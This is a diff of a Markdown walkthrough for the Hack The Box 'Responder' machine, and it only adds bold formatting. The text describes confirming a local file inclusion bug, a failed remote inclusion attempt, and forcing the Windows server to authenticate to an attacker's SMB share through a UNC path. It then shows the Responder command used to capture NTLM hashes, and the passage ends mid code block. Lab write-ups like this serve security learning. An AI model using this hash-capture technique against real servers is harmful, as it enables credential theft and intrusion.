nicola-guidi/HTB-Walkthorughs/responder-walkthrough/walkthrough.md

 ![LFI Success.png](images/lfi-success.png)

-The file was successfully included and displayed in the browser, confirming the presence of an LFI vulnerability.
+The file was successfully included and displayed in the browser, confirming the presence of an **LFI** vulnerability.
 At this point, I knew that the server was vulnerable to arbitrary file inclusion, and I began exploring ways to leverage this vulnerability to move further into the system.

 ## Deeper Investigation and NTLM Hash Capture via SMB

 After confirming the LFI vulnerability, I initially tried to escalate it to a **Remote File Inclusion (RFI)** attack by hosting a malicious web shell via a Python HTTP server, hoping to include it remotely through the vulnerable `page` parameter.
-Unfortunately, this approach did not work, as the server was not configured to allow RFI.
+Unfortunately, this approach did not work, as the server was not configured to allow **RFI**.

-While digging deeper, I discovered an important detail about how PHP’s `include()` function behaves on Windows systems when given a UNC path (a network share path like `\\10.10.14.249\fakeshare`).
+While digging deeper, I discovered an important detail about how PHP’s `include()` function behaves on Windows systems when given a **UNC path** (a network share path like `\\10.10.14.249\fakeshare`).
 When PHP on a Windows system attempts to include a remote file via a UNC path (e.g., `\\10.10.14.249\fakeshare`), the server tries to authenticate to that remote **SMB** share using **NTLM** authentication.

-This behavior can be abused to capture authentication hashes by setting up a malicious SMB server on the attacker’s machine.
+This behavior can be abused to capture authentication hashes by setting up a malicious **SMB** server on the attacker’s machine.
 The target server will automatically send its credentials when attempting to access the share, allowing an attacker to capture NTLM hashes.

-To exploit this, I launched **Responder** on my machine to listen and capture NTLM hashes over SMB.
+To exploit this, I launched **Responder** on my machine to listen and capture **NTLM** hashes over **SMB**.

 ```
 sudo responder -I tun0 -d -w